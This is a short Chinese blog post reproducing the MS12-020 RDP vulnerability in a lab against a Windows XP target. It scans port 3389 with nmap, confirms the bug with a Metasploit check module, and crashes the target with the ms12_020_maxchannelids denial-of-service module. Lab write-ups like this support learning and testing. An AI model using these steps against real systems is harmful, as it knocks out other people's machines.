ms12-020复现-xp蓝屏
2024-08-27 11:18:06
漏洞名:MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞)
介绍:RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。
靶机:xp 192.168.45.158
攻击机:kali 192.168.45.155
1 用nmap扫描一下靶机有没有开启3389
ms12-020复现-xp蓝屏
2. 扫描之后发现3389是开放的,然后启动msfconsole, 利用里面的模块查看是否存在Ms12-020漏洞。
使用 use auxiliary/scanner/rdp/ms12_020_check模块,建立目标地址
验证 run
存在这个漏洞 ,有效
3. 存在这个漏洞
直接利用蓝屏模块
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
查看需要设置什么参数
开始攻击 run
4. 攻击成功
最新文章
- 游标cursor
- Vue数据绑定隐藏的神坑....
- 总结的一些网站利于搜索引擎优化的小常识及SEO优化
- 边框(border)边距(margin)和间隙(padding)属性的区别
- mfc ui3
- NSDictionary初始化,使用@{}方法,插入nil时会报空指针异常
- 我用Cocos2d-x模拟《Love Live!学院偶像祭》的Live场景(三)
- php 中时间函数date及常用的时间计算
- 手把手教你用Vue造轮子(3):开发可排序的表格组件
- 安装Python的numpy库
- Ioc及Bean容器(三)
- DOM入门。
- css 别人找的css特效
- CentOS 安装、配置supervisord
- lua 设置文件运行的环境
- 泡泡一分钟:Semantic Labeling of Indoor Environments from 3D RGB Maps
- JavaScript高级特性-数组
- 洛谷P4141消失之物
- [转]同一个tomcat不同项目的session共享问题
- C# 提高必备精品--你所需要的NET笔记